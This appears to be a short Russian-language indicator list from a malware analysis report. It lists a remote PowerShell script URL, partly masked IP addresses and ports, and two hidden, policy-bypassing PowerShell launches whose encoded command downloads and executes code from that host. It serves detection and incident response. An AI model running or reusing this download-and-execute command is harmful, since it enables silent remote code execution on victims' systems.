Техническая информация
- http://193.233.233.92/f2.ps1
- '19#.#33.233.92':80
- http://19#.#33.233.92/f2.ps1
- '34.##9.100.209':443
- '34.##0.144.191':443
- '<SYSTEM32>\cmd.exe' /c powersHell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powersHell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5...